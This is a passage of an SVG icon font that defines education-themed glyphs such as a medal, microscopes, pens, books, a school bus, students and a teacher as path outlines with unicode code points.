<glyph glyph-name="medal" horiz-adv-x="1000" unicode="&#xeae2;" d="M928 626l-133 147c-7 7-18 12-28 11h-534c-10 1-21-4-28-11l-133-147c-11-12-12-29-4-43l218-352c-11-27-16-55-16-85 0-127 103-230 230-230h0c127 0 230 103 230 230 0 30-5 58-16 85l218 352c9 14 7 31-4 43z m-294-31l-134-219h0l-134 219h268z m-492 3l84 92 199-326c-38-13-72-36-98-66l-185 300z m509-435l-61-59 14-84c1-7-2-14-7-18-3-3-7-4-11-4-3 0-6 1-9 2l-75 40-76-40c-6-3-13-3-19 1-6 5-9 12-7 18l14 85-61 59c-5 5-7 12-5 19 2 7 8 12 15 13l85 12 37 76c3 7 10 11 17 11s13-4 16-11l38-76 85-12c7-1 12-6 15-13 2-7 0-14-5-19z m22 135c-26 30-60 53-98 66l199 326 84-92-185-300z" />
<glyph glyph-name="microscope-alt" horiz-adv-x="1000" unicode="&#xeae3;" d="M359-150h-228c-21 0-32 11-32 32 0 16 0 32 0 48 1 20 11 31 32 31 32 0 64 0 96 0 8 0 11 2 10 10 0 2 0 3 0 5 2 10-1 14-12 13-16-1-31-1-47 0-15 0-23 8-23 23-1 11 0 23 0 34 0 18 7 25 25 25 53 1 107 1 161 1 76 0 152 0 228-1 22 0 28-6 28-28 0-15 0-30 0-45 0-6 1-7 7-6 93 16 162 101 158 195-4 95-69 169-162 186-6 1-11 0-16-4-33-22-68-24-103-4-46 27-92 53-138 80-15 9-17 17-8 32 41 71 82 143 124 214 8 15 16 17 31 9 43-24 86-49 129-74 14-8 16-17 8-31-12-20-23-40-35-60-2-3-8-8-4-12 4-5 8-11 17-12 69-7 130-34 182-80 62-54 100-122 110-204 15-115-21-213-106-291-52-48-113-76-184-83-48-5-96-2-144-3-35 0-69 0-104 0l0 0z m198 597c0 16-12 28-27 28-15 0-27-12-27-28 0-15 12-27 27-27 15 0 27 12 27 27z m-87-119c0-3-2-6-4-10-11-20-23-40-34-61-8-13-17-15-30-8-44 25-87 51-131 76-12 7-14 16-7 28 11 20 22 41 34 61 7 13 17 15 30 8 43-25 86-50 130-75 7-4 12-9 12-19z m246 423c-5-11-11-24-21-33-4-4-10-3-15 0-9 5-18 10-26 15-6 5-10 4-13-3-11-19-22-38-33-57-3-5-5-7-11-3-19 11-39 23-58 34-6 3-6 6-3 11 11 18 20 37 32 54 5 9 3 13-5 17-8 4-15 8-23 13-10 6-12 12-6 23 4 7 8 14 12 21 5 7 12 9 21 5 46-27 92-54 139-81 5-3 10-7 10-16z" />
<glyph glyph-name="microscope" horiz-adv-x="1000" unicode="&#xeae4;" d="M713 484c-9 11-39 44-55 60-7 35-37 63-73 63-41 1-76-34-76-77 0-43 33-77 74-77 17 0 33 6 45 15 59-57 91-151 73-233-19-82-69-137-144-168l-13 15c-31 33-79 32-109-1-45-49-89-99-132-149-4-3-5-9-7-14 5-2 10-5 16-5 59-1 118-1 177-1 60 0 120 0 179 1 5 0 10 3 15 4-2 5-2 11-5 14-23 26-46 52-69 78 3 0 7 1 11 4 103 58 156 149 161 268 4 76-22 144-68 203z m-129-14c-31 1-57 28-57 60 0 32 26 58 57 58s57-26 57-58c0-32-27-60-57-60z m-94-475c-21 0-38 17-38 39-1 21 16 39 37 39 22 0 39-16 39-38 1-22-17-40-38-40z m-109 390c0-3 2-9 4-10 10-4 9-10 7-18-5-16-9-33-13-49-2-6-1-10 6-11 10-3 20-6 30-9 5-1 8 1 10 7 4 18 10 35 14 53 1 6 3 9 9 8 7 0 12 2 13 10 1 1 1 2 1 3 11-3 22-6 34-9 8 32 16 62 24 92 0 3-2 8-4 10-48 58-28 136 40 161 5 2 10 7 11 12 6 20 11 40 17 62-42 11-84 23-127 35-29-113-58-225-87-337l12-4c-1-2-1-4-1-6z m4-259c50 0 101 0 151 0 17 0 19 2 19 19 0 17-2 19-19 19-101 0-202-1-303 0-16 0-15-9-15-21 0-11 1-18 15-18 51 1 101 1 152 1z m-18-92c16 18 31 36 48 55-13 6-25 15-38 16-36 2-73 0-113 0 28-32 58-56 92-73 3-1 9 0 11 2z m97 717c41-11 81-23 121-34 16-4 15 9 18 19 4 10 1 15-9 18-33 9-66 18-99 27-8 2-16 4-24 7-14-1-12-13-14-21-3-7-2-14 7-16z m120-183c-20 0-38-18-37-38 0-21 17-39 37-39 20 1 37 18 37 39 0 21-17 38-37 38z" />
<glyph glyph-name="paper" horiz-adv-x="1000" unicode="&#xeae5;" d="M662 771c99-3 198-6 297-9 31-1 44-15 41-47-5-43-9-86-14-129-9-79-20-157-35-235-18-92-39-183-74-270-13-34-29-66-50-96-31-44-71-66-126-64-117 3-234 3-350 5-49 0-97 2-146 3-59 2-105 30-141 75-31 39-51 83-63 132-6 24 10 44 35 43 85-1 169-4 254-6 88-2 176-3 264-5 4 0 7-1 10-1 21 2 34-9 43-28 14-31 31-61 51-89 12-17 25-33 41-46 22-17 39-17 59 2 23 23 36 51 48 80 31 74 50 151 67 229 16 78 29 158 40 238 5 44 9 88 14 132 1 8-1 10-9 10-65 2-130 3-194 5-108 3-216 7-324 10-9 0-11-2-12-11-13-133-32-265-71-393-8-24-17-47-25-70-2-5-4-7-9-7-20 1-40 1-60 1-8 0-8 3-5 9 42 93 62 193 80 293 12 71 19 143 26 214 2 22 15 34 37 34l235-7c22-1 44 0 66 0 0-1 0-1 0-2z m-47-780c-26 34-45 68-63 103-2 4-5 6-10 5-10 0-20 1-30 1-85 2-169 4-254 6-52 1-105 2-158 3-19 1-19 1-11-16 29-56 67-97 137-97 118 0 235-3 353-5 11 0 22 0 36 0z m24 548c-49 1-97 3-145 4-5 1-9 1-14 2-11 1-18 9-17 20 0 11 7 18 18 20 4 0 9 0 13 0 99-4 198-8 297-11 14-1 22-9 22-21-1-12-9-20-23-19-50 1-101 3-151 4v1z m73-144c-83 3-166 6-248 9-14 0-23 6-24 17-2 10 3 17 12 22 4 2 9 1 14 1l125-4c52-2 103-4 154-5 7-1 14-1 19-7 6-6 7-13 5-21-4-9-11-13-21-14-12 0-36 1-36 2z m-139-139c-52 3-104 6-155 9-9 0-14 6-15 17-1 10 2 17 8 22 2 2 5 1 8 1l78-4c33-2 65-4 97-5 4-1 8-1 11-7 4-6 5-14 3-21-2-9-7-13-12-14-8 0-23 1-23 2z" />
<glyph glyph-name="pen-alt-4" horiz-adv-x="1000" unicode="&#xeae6;" d="M749 416c-61 60-123 122-184 183-5 6-8 6-14 0-162-162-324-325-487-487-11-11-18-24-21-40-4-28-9-56-15-84-1-7 0-11 5-15 30-30 59-60 89-90 3-2 6-6 11-5 26 5 52 11 78 14 23 3 41 13 57 30 50 51 101 101 151 152l328 328c5 4 9 7 2 14z m12 220c-28 27-55 55-82 82-22 21-39 21-61-1-5-4-9-9-14-14-21-21-21-38 0-59 76-75 151-151 227-226 7-7 7-10 0-17-75-75-150-150-225-225-16-16-16-35-1-50 15-15 34-15 50 1 91 90 182 181 273 272 9 10 14 21 15 35 0 15-7 27-17 37-56 55-110 110-165 165z m221 73c-42 42-83 84-125 125-22 21-49 21-70 0-22-21-43-42-65-63-5-6-4-9 1-14 61-61 123-123 184-184 4-4 6-6 11-1 22 23 45 45 67 67 9 9 14 20 13 34 1 15-6 26-16 36z m-968-778l-6-41-6-40 81 12-35 34-34 35z" />
<glyph glyph-name="pen-nib" horiz-adv-x="1000" unicode="&#xeae7;" d="M759 329c-20 26-41 51-60 77-37 53-78 103-94 168-2 8-7 7-12 7-63 0-125 0-187 0-8 0-11-2-13-11-5-24-16-46-29-68-35-60-77-115-122-169-9-10-9-16 2-25 23-20 42-44 59-69 66-94 110-199 152-305 10-26 20-53 31-84 1 7 2 9 2 11 0 138 0 277 0 415 0 9-3 14-11 19-21 11-30 32-24 52 6 21 23 35 44 36 20 1 40-13 46-32 7-21 0-43-20-55-11-6-12-13-12-24 0-79 0-158 0-237v-180l4 0c1 4 3 9 5 14 28 78 58 156 95 230 38 78 79 155 145 214 9 8 3 11-1 16z m-402 289c7-14 20-16 34-16h126c31 0 62 0 93 0 13 0 26 3 32 16 6 13 2 23-8 31-5 3-4 6 0 9 10 8 14 19 7 32-6 13-18 13-31 13h-111v0c-39 0-78 0-118 0-11 0-21-4-25-16-5-10-2-19 6-27 3-3 10-5 3-10-10-9-15-19-8-32z m257 130l12 102h-254l11-102h231z" />
<glyph glyph-name="pencil-alt-5" horiz-adv-x="1000" unicode="&#xeae8;" d="M976 615l-211 211c-15 15-35 23-57 23s-42-8-57-23l-593-593c-14-15-28-35-39-62-12-27-18-53-18-77v-243h244c25 0 50 6 76 17s47 25 62 40l593 593c15 15 23 34 23 57s-8 42-23 57z m-376 7l66-67-448-449-68 66 450 450z m-355-663h-82l-54 55v80c0 8 3 19 9 34l23-24c16-14 35-34 59-57 23-24 41-42 52-52 11-11 20-20 27-27-13-6-24-9-34-9z m77 41l-66 68 449 448 67-66-450-450z m487 488l-171 173 70 69 171-172-70-70z" />
<glyph glyph-name="quill-pen" horiz-adv-x="1000" unicode="&#xeae9;" d="M677 691c-5-1-11-3-17-3-4 0-10-3-12 1-2 4 3 7 6 10 10 10 21 19 31 29 6 4 8 10 8 17 0 11 0 22 0 34-1 18 2 38-4 56-5 17-12 19-26 9-8-6-14-13-20-21-74-88-129-189-174-294-6-14-9-29-6-44 2-15 6-29 11-43 2-8 1-14-1-20-3-7-5-6-9-2-8 8-16 17-22 27-1 2-2 6-5 5-3 0-3-4-4-6-4-10-8-20-12-30-18-45-34-91-50-136-8-26-4-49 12-70 9-12 18-24 29-34 6-6 7-11 5-18-5-16-8-32-13-47-2-9 0-11 9-11 8 1 16 1 24 1 5-1 8 1 10 7 3 14 8 29 10 43 2 14 10 21 22 25 17 7 35 14 51 23 20 10 35 26 43 47 6 15 2 22-13 25-13 2-27 4-41 6-3 0-7 1-8 5 0 3 4 5 6 6 14 7 29 12 44 16 21 5 32 16 38 38 24 77 52 153 71 232 9 35 16 71 19 108 1 10-1 11-12 9z m-208-708c-20 0-41 0-61 1-11 0-17 5-17 15-1 11 5 17 17 18 8 0 17 0 26 0 23 0 23 0 26 24 1 6 1 10-8 10-30-1-59 0-89 0-8 0-8-4-7-10 2-11 4-22 6-34 1-4 0-8-3-11-37-38-51-85-53-136 0-8 3-10 10-10 32 0 64 0 96 0 32 0 65 0 97 0 4 0 9-2 9 6 1 44-9 85-36 122-4 4-8 5-13 5z" />
<glyph glyph-name="read-book-alt" horiz-adv-x="1000" unicode="&#xeaea;" d="M849-77c0 1 0 3 0 4v462c0 2 0 5-1 8h-13c-15-3-31-2-46-4-81-6-161-18-236-49-17-6-32-14-47-23-4-2-6-3-10-1-54 32-113 49-173 60-49 8-97 13-146 15-4 0-8-1-11 2h-13c-1-4-1-7-1-11v-457c0-14-2-12 13-13 87-3 172-13 254-41 15-4 29-10 43-17 10-4 20-5 29-8h19c50 15 99 38 151 47 47 8 94 14 141 17 13 1 27 2 40 2 5 1 7 2 7 7z m-382 153v-136c0-10 0-10-9-6-54 20-110 32-167 39-22 3-43 6-65 7-7 1-7 4-7 10 0 54 0 109 0 163v163c0 5-1 10 8 9 72-7 143-19 209-49l23-12c7-3 8-7 8-14 0-58 0-116 0-174z m305-96c-79-6-156-19-230-47-7-3-8-1-8 6 0 104 0 209 0 313 0 7 3 9 8 12 39 23 82 36 126 45 34 8 69 12 104 16 8 1 10-2 10-9 0-55 0-109 0-163 0-54 0-108 0-162 0-8-2-10-10-11z m-433 534c11-8 18-16 24-28 29-51 69-86 130-89 71-3 117 35 149 95 3 8 7 14 15 19 26 14 40 38 46 66 4 19 5 41-13 55-13 9-16 21-17 35-9 71-43 122-115 145-30 10-59 22-88 35-14 6-18 3-17-11 1-16-6-15-16-8-3 2-5 4-13 9 7-24-7-28-21-33-34-14-57-38-69-74-7-21-11-44-11-67 1-13 0-24-13-32-9-4-12-14-13-24-4-39 10-71 42-93z m-16 86c2 10 9 16 20 17 10 1 17-2 20-12 2-7 5-16 15-14 10 2 9 11 10 19 4 17 3 35 3 53 1 25 13 43 37 52 48 18 96 18 144-1 20-9 33-22 33-46 1-21 4-42 6-63 0-6 1-13 9-14 8-1 12 4 14 10 4 16 15 19 28 15 13-3 16-15 14-27-4-25-13-48-40-56-10-4-12-11-15-19-20-46-52-80-104-89-5-1-10-1-15-2-61 4-97 39-122 90-5 11-9 17-21 21-21 6-40 44-36 66z" />
<glyph glyph-name="read-book" horiz-adv-x="1000" unicode="&#xeaeb;" d="M874 672c0-52 0-103 0-154 0-20 0-40 0-61 0-4 1-8-6-6-26 7-48-1-66-22-2 5-1 9-1 13 0 46-1 93 0 140 0 8-2 11-11 10-83-9-165-22-241-61-10-6-14-12-14-25 1-107 0-214 0-321v-13c2-2 4-1 6 0 78 29 158 43 240 51 7 0 9-1 9-8-1-20 1-39 8-58 3-9-3-8-7-8-38-3-74-8-111-15-46-9-91-20-133-40-33-15-64-14-96 0-62 28-128 41-195 50-16 2-33 3-49 5-7 0-7 3-5 8 6 18 9 36 8 55-1 8 1 11 11 10 82-8 162-22 240-51 2 3 1 7 1 10 0 110 0 220 1 330 0 8-3 13-10 17-52 29-109 44-167 54-26 4-52 7-78 10-10 1-11-3-11-11 0-49 0-98 0-150-22 22-45 27-73 18 0 3-1 5-1 7 0 70 0 139 0 208 0 3 1 5 1 8h17c2-3 5-2 8-2 50-2 100-7 150-16 67-11 133-29 193-64 6-3 9-2 14 1 23 13 46 24 71 32 71 26 145 37 221 44 19 2 39 0 58 5h18z m-763-264c-6-48-14-94-25-140-1-7-3-14 6-16 8-2 9 5 11 11 9 35 13 71 19 107 1 8 1 16 3 24 3 16 13 25 26 24 14-1 23-12 24-27 0-11 0-21 0-31 0-48-1-96 0-145 0-27-6-53-21-76-20-31-34-65-40-102-2-8-5-9-13-6-31 11-62 22-93 32-7 2-10 4-6 13 23 46 23 95 16 144-2 18-4 36-4 54-1 24 7 44 22 62 22 25 47 47 70 69 1 1 3 2 5 3z m777 1c11-7 18-16 26-24 12-10 22-22 34-32 36-30 43-69 36-113-6-43-11-87 1-130 4-12 8-24 13-35 3-6 3-9-3-11-33-11-66-23-99-34-5-2-8-1-9 5-7 42-26 80-48 117-10 16-14 34-14 52 0 62 0 123 0 185 0 11 4 21 14 26 9 5 18 4 26-2 8-6 10-15 11-24 5-40 11-80 19-119 1-3 2-5 2-8 2-5 4-12 11-10 8 1 8 8 6 14-4 21-9 41-13 62-4 26-8 53-13 81z m-474 45c0-26 0-26-25-19-38 12-76 22-116 29-7 2-9 5-9 11 1 10 1 21 0 31 0 9 3 11 11 9 39-8 77-16 114-28 25-7 25-7 25-33z m0-87c0-27 0-27-25-19-38 12-77 21-116 29-6 1-9 2-9 9 1 11 1 23 0 35 0 8 4 8 9 7 46-9 90-20 134-34 5-1 7-4 7-9 0-6 0-12 0-18z m169 88c0 25 0 25 25 32 38 12 76 20 115 28 7 2 11 1 10-8-1-13 4-28-2-38-5-10-23-7-35-10-34-8-68-17-101-28-10-4-13-2-12 8 1 5 0 10 0 16z m0-88c0 25 0 25 25 32 37 12 76 21 115 29 8 1 11-1 10-9 0-8-1-17 0-25 2-12-3-17-15-19-42-7-83-18-123-32-11-4-13 0-12 9 1 5 0 10 0 15z m-169-90c0-26 0-26-25-18-37 11-75 21-114 28-7 2-11 4-11 13 1 11 1 22 0 33 0 5 2 7 8 6 45-8 90-20 135-33 5-2 8-5 7-11 0-6 0-12 0-18z" />
<glyph glyph-name="school-bag" horiz-adv-x="1000" unicode="&#xeaec;" d="M471 850h43c10-2 21-4 31-6 53-12 87-47 94-101 2-13 7-17 19-19 19-5 38-11 53-24 16-14 30-29 42-45 50-64 77-138 97-215 20-82 31-165 37-249 6-74 8-148 8-223-1-48-24-83-65-106-8-5-17-8-25-12h-600c-3 3-7 3-11 4-55 16-90 62-90 119 1 99 4 197 16 294 8 72 20 143 41 212 19 65 46 128 90 182 23 29 49 56 88 63 9 2 12 7 13 16 3 53 36 92 88 104 10 2 21 4 31 6z m28-524h-215c-9 0-19-1-27-6-29-18-48-44-48-79-1-83 0-166 0-249 0-9 1-18 5-26 16-35 46-52 82-55 59-6 118-2 177-2 5 0 6 2 6 6 0 13 0 25 0 37 0 13 6 19 19 19 16 0 22-5 22-18 1-12 1-23 1-35-1-7 1-10 9-10l176 1c47 0 85 38 85 84 0 80-1 159 0 238 1 30-11 54-30 75-12 13-27 20-46 20-72-1-144 0-216 0z m269 62h9c12 0 12 0 10 12-3 17-5 34-10 50-23 87-66 162-144 210-87 55-177 56-264 2-96-60-140-153-156-262-2-12-1-12 11-12 26 0 26 0 30 26 14 73 44 136 100 187 37 33 80 54 130 57 69 5 127-21 175-70 49-50 76-111 87-179 3-21 3-21 22-21z m-207 351c11-1 11-1 8 10-2 12-6 23-13 33-15 25-38 36-67 35-27-1-47-15-58-40-5-9-7-18-10-28-3-9 0-11 9-10 44 3 87 2 131 0z m-477 11c3 7 3 15 5 22 10 42 31 60 79 64 53 3 100-12 139-47 2-1 3-3 5-5-38-22-68-52-101-78-15 25-33 46-56 62-10 6-20 13-31 7-11-5-12-17-12-28-2-25 3-49 8-73 5-26 12-52 20-78 2-7 3-15 0-22-5-12-9-25-13-39-15 41-27 80-35 120-3 16-5 32-8 49v46z m832-43c-2-17-5-34-8-50-7-41-20-80-35-119-4 20-20 38-12 62 13 40 23 82 27 124 1 11 1 22-1 33-3 18-14 24-30 17-19-8-32-23-45-37-9-9-16-19-22-31-34 26-65 56-102 78 26 25 56 41 90 48 23 5 45 5 68 2 34-5 55-23 64-57 2-10 4-21 6-31 0-12 0-26 0-39z m-416-423h202c9 0 17-1 24-4 23-8 34-27 31-51-5-51-23-97-43-142-1-3-3-6-4-8-15-45-51-66-94-77-54-13-109-13-164-10-38 1-75 5-111 16-10 3-19 7-28 12-12 7-20 15-24 28-17 47-32 94-41 143-3 13-4 26-5 39-1 31 19 53 49 53 27 1 54 1 80 1h128z" />
<glyph glyph-name="school-bus" horiz-adv-x="1000" unicode="&#xeaed;" d="M1000 223c0 24 0 24-24 24-8 0-10 3-10 10 0 26 1 52-1 77-1 16-9 27-24 33-3 2-6 2-8 6-4 8-9 16-12 25-23 76-46 151-69 227-3 10-8 15-18 17-42 9-84 16-127 16-208 1-416 0-623 0-19 0-36-3-51-14-19-16-26-38-26-62 0-99 0-199 0-298 0-16-2-14 13-14 222-1 445-1 667-1 8 0 12-2 11-11-1-7 1-14-11-14-119 1-238 2-357 3-25 0-50 0-75 0l-2-2c2-2 4-3 6-4 24-21 39-46 44-78 1-8 5-7 10-7 112 0 224 0 336 0 6 0 9 1 10 8 13 79 95 127 169 98 44-17 70-50 79-96 1-6 1-11 9-10 19 0 38 0 56 1 18 0 27 11 28 28 0 13 0 26 0 38z m-826 268c0-26-1-51 0-77 0-9-3-14-13-13-4 0-7 0-11 0-15-2-25 0-29 18-4 14-16 23-32 23-16 0-26-10-33-24-2-3-3-6-4-10-1-4-1-7-6-7-6 1-9 3-9 8 0 8 0 15 0 23 0 46 0 91 0 137 0 9 3 12 12 12 37 0 75 0 113 0 9 0 12-4 12-13-1-26 0-51 0-77z m155-93c-15 0-30 0-46-1-4 0-7 1-8 6-1 1-2 2-2 3-6 11-15 19-27 19-13 0-21-8-27-18-2-3-1-10-8-8-6 2-5 7-5 12-1 51 0 102-1 154 0 9 4 14 13 14 37-1 74-1 111-1 9 1 13-3 13-12 0-26 0-52 0-78 0-26 0-52 0-78 0-9-4-12-13-12z m178 15c0-3 0-6-1-8-2-4-7-4-10-5-5 0-5 4-6 6-1 9-5 16-11 22-13 15-32 15-45 0-3-4-7-8-8-13-1-15-11-16-23-15-7 1-14 0-21 0-9 0-12 4-12 13 0 26 0 52 0 78 0 26 0 51 0 77 0 9 3 13 13 13 37-1 74 0 112 0 8 0 12-3 12-12 0-52 0-104 0-156z m157-14c-12 1-24 1-35 0-7 0-8 3-9 8-2 9-6 18-13 24-12 13-27 13-39 0-7-6-11-15-13-24 0-3 0-8-6-8-5 1-9 3-9 9-1 2 0 5 0 7 0 50-1 99 0 149 0 14 2 16 16 16 35 0 70 0 105 0 14 0 16-2 16-15 0-25 0-50 0-75 0-26 0-52 0-77 0-10-4-14-13-14z m187-1c-15 0-30 0-45 0-15 0-30 0-45 0-16 0-21 5-21 20 0 50 0 99 0 148 0 17 4 21 21 21 10 0 19 0 29 0 14-1 23-8 28-21 17-46 34-92 51-138 0-2 1-3 1-5 4-17-2-25-19-25z m-673-151c-56 0-102-46-102-103 0-57 45-102 102-102s103 46 103 103c0 51-50 102-103 102z m-1-147c-28 0-43 15-43 43 0 28 15 42 43 43 28 0 43-15 43-43 0-28-15-43-43-43z m606 147c-57-1-102-46-102-103 0-57 46-103 103-102 57 0 101 44 102 102 1 54-51 104-103 103z m-1-147c-28 0-43 15-43 43 0 28 15 43 43 43 28 0 43-15 43-44 0-27-15-42-43-42z m-678 147c-33 0-65 0-96 0-6 0-8-1-8-7 0-14 0-28 0-41 0-32 14-44 45-43 6 0 8 1 9 8 3 23 13 45 29 63 6 7 13 13 21 20z m156 278c-26 0-48-23-48-49 0-26 22-48 48-48 26 0 48 22 48 48 1 26-22 49-48 49z m342 20c-27 1-48-21-48-47 0-26 21-48 47-49 26 0 49 23 49 49 0 26-22 47-48 47z m-160-6c-26 0-49-22-49-49 0-26 22-47 48-47 26-1 49 22 49 48-1 25-22 47-48 48z m-343 8c-26 0-48-21-48-47-1-27 21-49 48-49 26 0 47 21 47 47 1 27-21 49-47 49z" />
<glyph glyph-name="student-alt" horiz-adv-x="1000" unicode="&#xeaee;" d="M828-121c0 5-1 11-1 17-1 1-1 3-1 6-2 65-6 131-13 196-6 50-14 100-23 149-6 32-22 52-51 64-18 7-35 14-52 21-11 3-15 1-19-8-14-32-35-60-62-82-23-20-48-36-74-51-13-7-17-16-17-31 1-87 0-174 0-261l0-2h-30c0 0 0 1 0 2 0 89 0 179 0 268 0 9-2 15-10 19-16 10-32 20-48 30-24 17-47 34-65 57-13 17-23 36-33 54-2 5-4 9-11 7-27-10-54-19-78-34-13-9-23-20-26-35-19-75-27-151-33-228-4-46-8-93-8-140h0c0-6-1-12-1-18-1-20 8-29 28-29h600c20 0 29 9 28 29z m-486 640c10-6 15-15 19-25 15-38 33-75 62-104 44-42 101-43 145-2 35 31 57 71 74 114 3 7 7 12 13 17 27 18 31 44 12 69-3 4-1 7 0 10 5 16 10 32 10 49 1 43-17 79-45 109-7 8-8 14-4 22 5 10 11 19 17 30-17-1-30-7-42-14-8-5-10-2-14 4-8 16-10 34-15 52-9-8-13-17-17-27-4-9-8-8-15-3-9 8-17 18-29 25-1-3-1-4-2-6-3-8 7-19-2-24-6-4-17-2-25-2l-1 0c-71-9-121-46-152-109-17-33-13-67-4-102 2-5 6-9 1-15-21-26-8-55 14-68z m36 74c35-1 70 1 105 10 36 9 69 26 97 54 9-31 24-55 47-75 3-3 4-7 3-11-16-55-36-109-77-151-11-12-24-22-40-26-30-8-53 6-73 27-28 31-42 68-55 107-6 18-10 37-16 55-3 9 0 11 9 10z m217-239c-4 1-7 1-9-3-15-39-50-58-81-81-3-2-5-4-10-1-31 23-65 42-81 80-2 3-3 7-7 6-16-4-31-6-46-9-6-1-5-5-3-8 12-20 23-40 39-57 27-31 64-50 98-73 5-3 8-1 11 1 19 13 38 25 56 37 35 23 59 55 78 91 3 5 4 8-3 9-14 2-28 5-42 8z" />
<glyph glyph-name="student" horiz-adv-x="1000" unicode="&#xeaef;" d="M781 107c-1 9-3 12-13 9-60-17-120-34-181-46-31-6-62-13-93-11-31 2-62 7-92 14-56 13-112 27-167 44-9 2-11 0-12-8-10-71-17-142-20-214 0-7-1-11-1-15h0c0-3 0-5 0-8-1-15 7-22 26-22h551c19 0 27 7 26 22 0 3 0 5-1 8-3 76-12 152-23 227z m-523 302c9 0 11 2 10 10-2 40 0 79 10 117 5 21 13 41 32 58 5-32 19-58 41-79 6-5 10-12 15-19 17-31 37-59 65-81 42-33 91-34 134-3 30 23 52 53 70 85 2 5 5 10 9 14 20 19 33 44 41 71 1 4-1 10 3 11 6 1 8-5 11-9 17-21 24-47 28-73 5-30 6-61 5-91 0-6-1-11 7-12 48-5 85 27 84 75-2 66-56 133-120 146-11 3-12 7-12 16 2 24 1 49-8 72-27 77-82 122-161 132-82 9-146-25-190-96-20-32-26-68-24-106 1-10-2-16-13-18-37-8-66-30-87-60-19-25-30-53-30-83-1-47 24-80 80-77z m110 198c21 5 30 23 40 40 4 8 7 16 13 28 5-21 5-38 0-54-2-8 0-12 8-12 11 0 20 2 27 10 17 17 25 39 32 61 2 4 2 8 5 11 6-21 5-42 3-63 0-7 3-10 9-10 39-6 79-8 118 1 16 3 16 3 14-12-10-56-33-106-70-148-42-47-95-46-135 1-3 3-5 5-7 7-30 39-50 81-60 129-1 4-5 9 3 11z m10-323c2 26 6 53 9 80-32-9-62-21-89-38-21-12-34-29-41-52-10-34-17-67-24-101-2-11 1-13 11-16 69-22 139-39 210-51 20-4 40-10 61-6 82 13 164 31 244 56 11 4 13 8 11 18-7 33-13 66-23 98-6 23-20 41-40 53-25 16-53 27-80 37-11 3-11-2-10-9 6-28 8-56 10-85 2-23 1-46 1-70-39 23-78 47-116 70-7 5-12 5-19 1-37-23-74-45-111-68-6-4-9-3-8 5 1 26 2 52 4 78z" />
<glyph glyph-name="teacher" horiz-adv-x="1000" unicode="&#xeaf0;" d="M894-102c-1 22-4 44-6 66-7 57-17 113-31 169-6 21-13 41-20 62-13 41-43 64-81 79-31 12-63 19-94 30-7 3-9 1-10-5-6-24-12-48-19-71-18-67-37-133-66-195-1-4-2-8-6-9 0 0-1 1-1 1-7 36-15 72-21 107-5 31-18 62-6 94 4 11-2 16-11 22-16 11-28 11-43 0-13-9-13-8-10-24 2-12 6-24 3-37-8-41-15-82-23-123-3-14-6-27-9-43-10 18-16 34-22 50-27 69-46 140-65 211-2 8-1 20-7 23-6 2-16-4-24-7-32-10-64-17-95-32-29-14-49-35-61-65-14-37-24-74-32-112-14-68-25-136-27-205-1-23 9-34 33-34 239 0 478 0 717 0 15 0 27 3 34 15 3 9 3 23 3 32 0 0 0 1 0 1z m-575 602c10-3 13-8 16-16 19-46 43-89 82-121 30-24 63-37 102-31 28 4 51 18 72 37 36 33 60 74 77 120 2 3 2 9 6 9 16 0 22 13 32 21 17 13 18 31 14 50-1 9-6 14-15 13-8-1-9 2-7 8 5 25 8 50 9 78-1 7-1 16-2 25-3 20-8 38-28 49-4 2-5 5-7 9-19 36-45 64-82 81-25 11-50 16-76 18-69 3-126-18-164-79-2-5-6-6-10-8-15-6-27-17-34-31-9-19-14-40-15-60-1-28 3-55 9-83 1-4 1-7-5-7-6 0-10-4-11-9-10-28 9-66 37-73z m43 60c-1 8 1 16 10 20 4 2 8 3 12-2 3-5 8-5 12-4 6 0 9-1 8-8-1-12 7-20 17-20 11 1 18 10 16 22-1 5 1 6 5 6 5 0 11-1 16 2 3 2 4 0 5-2 10-12 10-28 0-39-19-20-44-28-71-23-16 3-27 20-30 41 0 3 0 5 0 7z m257-101c-16-29-34-56-61-76-40-29-82-28-122 6-32 28-53 64-70 103 0 1 0 2 0 4 28-13 56-10 82 2 25 12 43 28 43 58 1 7 5 6 9 6 4-1 9 1 10-6 7-41 39-67 82-68 8 0 15 0 23 1 7 2 13 5 21 7-4-14-11-25-17-37z m-23 52c-18 0-35 5-50 16-9 7-15 16-16 28 0 7 4 13 7 19 2 2 4 3 8 2 12-1 21-3 21-19-1-8 11-12 19-10 9 3 14 10 12 18-2 9 2 9 8 9 4 0 8 0 12 3 8 7 18 4 21-7 9-25-15-60-42-59z m-226 196c3 3 5 3 7 0 37-47 89-59 145-62 23-1 45 1 67 8 12 3 16 9 13 17-4 9-11 8-19 6-42-12-83-10-124 3-2 1-3 2-5 2 22-3 43-5 65-4 37 1 71 12 100 35 8 6 11 4 15-3 12-20 17-41 20-63 2-20 3-40 2-63-13 21-32 18-51 18-19 0-38 0-57 0-12 0-20-5-26-15-4-5-7-7-13-6-3 1-6 1-9 0-11-1-19 1-25 11-4 7-12 10-21 10-24 0-47 0-71 0-20 0-23-2-37-15-15 36-3 95 24 121z" />
<glyph glyph-name="test-bulb" horiz-adv-x="1000" unicode="&#xeaf1;" d="M500 850h61c45 0 83-30 93-74 9-43-12-86-53-105-6-3-8-5-8-12 0-42 0-84 0-126 0-7 3-9 9-11 128-45 209-133 235-266 37-183-87-364-270-400-172-33-342 67-395 233-57 181 42 373 223 432 8 2 11 6 11 15 0 42 0 84 1 127 0 6-5 6-8 8-32 15-51 40-55 76-6 54 37 102 91 103 22 0 43 0 65 0z m31-252c0 39 0 77 0 115 0 8 1 12 10 11 7-1 14-1 21 0 17 0 31 14 31 30 1 18-11 33-30 33-42 1-84 1-127 0-17 0-30-14-30-31s13-29 31-30c7-1 15-1 22 0 8 0 10-2 10-10 0-77 0-155 0-232 0-9-2-12-11-13-189-27-296-236-207-407 55-106 170-165 289-148 151 21 257 159 239 311-14 125-113 227-238 244-8 1-10 4-10 12 0 39 0 77 0 115z m-30-623c-110 0-202 80-218 187-5 36-1 71 11 105 2 6 3 7 9 3 69-45 139-38 198 19 50 47 116 58 174 29 5-3 9-6 12-10 81-136-1-309-157-331-10-1-20-3-29-2z" />
